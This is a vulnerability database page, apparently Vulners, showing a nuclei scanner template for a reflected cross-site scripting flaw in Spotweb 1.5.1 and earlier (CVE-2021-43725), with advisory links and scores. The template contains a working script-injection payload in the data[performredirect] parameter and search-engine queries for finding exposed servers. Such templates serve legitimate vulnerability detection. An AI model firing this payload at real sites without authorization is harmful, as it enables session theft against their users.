Lucene search
K

Spotweb <= 1.5.1 - Cross Site Scripting (Reflected)

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 43 Views

Spotweb <= 1.5.1 - Cross Site Scripting (Reflected) vulnerability in SpotPage_login.php allows remote attackers to inject arbitrary web script or HTML via the data[performredirect] parameter

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2021-43725
28 Mar 202213:15
attackerkb
Circl
CVE-2021-43725
28 Mar 202216:39
circl
CNNVD
Spotweb 跨站脚本漏洞
28 Mar 202200:00
cnnvd
CNVD
Spotweb Cross-Site Scripting Vulnerability (CNVD-2022-34641)
30 Mar 202200:00
cnvd
CVE
CVE-2021-43725
28 Mar 202212:52
cve
Cvelist
CVE-2021-43725
28 Mar 202212:52
cvelist
Debian CVE
CVE-2021-43725
28 Mar 202212:52
debiancve
EUVD
EUVD-2021-30632
3 Oct 202520:07
euvd
NVD
CVE-2021-43725
28 Mar 202213:15
nvd
OSV
UBUNTU-CVE-2021-43725
28 Mar 202213:15
osv
Rows per page
id: CVE-2021-43725

info:
  name: Spotweb <= 1.5.1 - Cross Site Scripting (Reflected)
  author: theamanrawat
  severity: medium
  description: |
    There is a Cross Site Scripting (XSS) vulnerability in SpotPage_login.php of Spotweb 1.5.1 and below, which allows remote attackers to inject arbitrary web script or HTML via the data[performredirect] parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, potentially leading to session hijacking, data theft, or other attacks.
  remediation: Fixed in version 1.5.2
  reference:
    - https://github.com/spotweb/spotweb/
    - https://github.com/spotweb/spotweb/issues/718
    - https://nvd.nist.gov/vuln/detail/CVE-2021-43725
    - https://github.com/spotweb/spotweb/commit/2bfa001689aae96009688a193c64478647ba45a1
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-43725
    cwe-id: CWE-79
    epss-score: 0.02583
    epss-percentile: 0.83358
    cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 1
    vendor: spotweb_project
    product: spotweb
    shodan-query:
      - title:"SpotWeb - overview"
      - http.title:"spotweb - overview"
    fofa-query: title="spotweb - overview"
    google-query: intitle:"spotweb - overview"
  tags: cve,cve2021,xss,spotweb,unauth,spotweb_project,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/?data[performredirect]=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&page=login"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'value=""><script>alert(document.domain)</script>'
          - 'name="data[performredirect]'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100923a1655f8099923b8b46356379b04e414d0c8c6381e7a1cd36d6256454c2f8d022100f26211ff6aa597599685da81d729e7498e402f85dbc20d147ca9e140cdf7a2c8:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 24.3
CVSS 3.16.1
EPSS0.02583
43